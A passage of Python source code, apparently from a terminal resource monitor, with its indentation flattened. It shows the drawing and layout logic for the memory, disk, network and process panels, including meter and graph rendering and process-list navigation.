out += f'{Mv.r(max(6, 6 * cls.column_size))}'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
if CONFIG.show_uptime:
out += f'{Mv.to(y + (0 if not CONFIG.cpu_invert_lower or CONFIG.cpu_single_graph else h - 1), x + 1)}{THEME.graph_text}{Fx.trans("up " + cpu.uptime)}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
num = 2
height_p = 38
width_p = 45
min_w: int = 36
min_h: int = 10
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
disks_io_h: int = 0
disks_io_order: List[str] = []
graph_speeds: Dict[str, int] = {}
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
if not "mem" in cls.boxes:
Box._b_mem_h = 0
cls.width = Term.width
return
width_p: int; height_p: int
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 60 if "net" in cls.boxes else 98
elif not "net" in cls.boxes:
height_p = 98 - CpuBox.height_p
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if not "mem" in cls.boxes: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("d")}{THEME.title("isks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
Key.mouse["d"] = [[cls.divider + 3 + i, cls.y] for i in range(5)]
else:
out += f'{Mv.to(cls.y, cls.x + cls.width - 9)}{THEME.mem_box(Symbol.title_left)}{THEME.hi_fg("d")}{THEME.title("isks")}{THEME.mem_box(Symbol.title_right)}'
Key.mouse["d"] = [[cls.x + cls.width - 8 + i, cls.y] for i in range(5)]
return out
@classmethod
def _draw_fg(cls):
if not "mem" in cls.boxes: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls.redraw = True
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.swap_disk and CONFIG.show_disks:
break
elif CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if CONFIG.show_disks and mem.disks:
if CONFIG.show_io_stat or CONFIG.io_mode:
d_graph: List[str] = []
d_no_graph: List[str] = []
l_vals: List[Tuple[str, int, str, bool]] = []
if CONFIG.io_mode:
cls.disks_io_h = (cls.height - 2 - len(mem.disks)) // max(1, len(mem.disks_io_dict))
if cls.disks_io_h < 2: cls.disks_io_h = 1 if CONFIG.io_graph_combined else 2
else:
cls.disks_io_h = 1
if CONFIG.io_graph_speeds and not cls.graph_speeds:
try:
cls.graph_speeds = { spds.split(":")[0] : int(spds.split(":")[1]) for spds in list(i.strip() for i in CONFIG.io_graph_speeds.split(","))}
except (KeyError, ValueError):
errlog.error("Wrong formatting in io_graph_speeds variable. Using defaults.")
for name in mem.disks.keys():
if name in mem.disks_io_dict:
d_graph.append(name)
else:
d_no_graph.append(name)
continue
if CONFIG.io_graph_combined or not CONFIG.io_mode:
l_vals = [("rw", cls.disks_io_h, "available", False)]
else:
l_vals = [("read", cls.disks_io_h // 2, "free", False), ("write", cls.disks_io_h // 2, "used", True)]
Graphs.disk_io[name] = {_name : Graph(width=cls.disks_width - (6 if not CONFIG.io_mode else 0), height=_height, color=THEME.gradient[_gradient],
data=mem.disks_io_dict[name][_name], invert=_invert, max_value=cls.graph_speeds.get(name, 10), no_zero=True)
for _name, _height, _gradient, _invert in l_vals}
cls.disks_io_order = d_graph + d_no_graph
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if not "i" in Key.mouse:
Key.mouse["i"] = [[x + w - 10 + i, y-1] for i in range(2)]
out_misc += (f'{Mv.to(y-1, x + w - 11)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.io_mode else ""}'
f'{THEME.hi_fg("i")}{THEME.title("o")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if Collector.collect_interrupt: return
Draw.buffer("mem_misc", out_misc, only_save=True)
try:
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = cls.mem_width > 21
for name in cls.mem_names:
if cy > h - 1: break
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if cy > h - 1: break
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks and mem.disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = cls.disks_width >= 25
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
if CONFIG.io_mode:
for name in cls.disks_io_order:
item = mem.disks[name]
io_item = mem.disks_io_dict.get(name, {})
if Collector.collect_interrupt: return
if cy > h - 1: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
if big_disk:
out += Fx.trans(f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(str(item["used_percent"])) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["used_percent"]}%')
cy += 1
if io_item:
if cy > h - 1: break
if CONFIG.io_graph_combined:
if cls.disks_io_h <= 1:
out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}'
out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io"] or "RW"}')
cy += cls.disks_io_h
else:
if cls.disks_io_h <= 3:
out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}{Mv.to(y+cy+1, x+cx-1)}{" " * 5}'
out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["read"](None if cls.redraw else mem.disks_io_dict[name]["read"][-1])}'
f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io_r"] or "R"}')
cy += cls.disks_io_h // 2
out += f'{Mv.to(y+cy, x+cx-1)}{Graphs.disk_io[name]["write"](None if cls.redraw else mem.disks_io_dict[name]["write"][-1])}'
cy += cls.disks_io_h // 2
out += f'{Mv.to(y+cy-1, x+cx-1)}{THEME.main_fg}{item["io_w"] or "W"}'
else:
for name, item in mem.disks.items():
if Collector.collect_interrupt: return
if not name in Meters.disks_used:
continue
if cy > h - 1: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
if big_disk:
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{Fx.trans(item["io"])}'
cy += 1
if cy > h - 1: break
if CONFIG.show_io_stat and name in Graphs.disk_io:
out += f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{Fx.ub}{" IO: " if big_disk else " IO " + Mv.l(2)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
if not big_disk and item["io"]:
out += f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{THEME.main_fg}{item["io"]}'
cy += 1
if cy > h - 1: break
out += Mv.to(y+cy, x+cx) + (f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U ")
out += f'{Meters.disks_used[name](None if cls.resized else mem.disks[name]["used_percent"])}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 3 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name](None if cls.resized else mem.disks[name]["free_percent"])}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1: cy += 1
except (KeyError, TypeError):
return
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
num = 3
height_p = 30
width_p = 45
min_w: int = 36
min_h: int = 6
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "net" in cls.boxes:
cls.width = Term.width
return
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if not "net" in cls.boxes: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if not "net" in cls.boxes: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if net.address and w - len(net.nic[:10]) - len(net.address) - 20 > 15:
out_misc += (f'{Mv.to(y-1, x+7)}{THEME.net_box(Symbol.title_left)}{Fx.b}{THEME.title(net.address)}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None, round_up_low=True)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
num = 4
height_p = 68
width_p = 55
min_w: int = 44
min_h: int = 16
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "proc" in cls.boxes:
cls.width = Term.width
return
width_p: int; height_p: int
if not "net" in cls.boxes and not "mem" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if not "proc" in cls.boxes: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
if key in ["up", "k"]:
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key in ["down", "j"]:
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if not "proc" in cls.boxes: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "T", "K", "I", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details.get("killed", False)
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["T"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "K" in Key.mouse: Key.mouse["K"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "I" in Key.mouse: Key.mouse["I"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
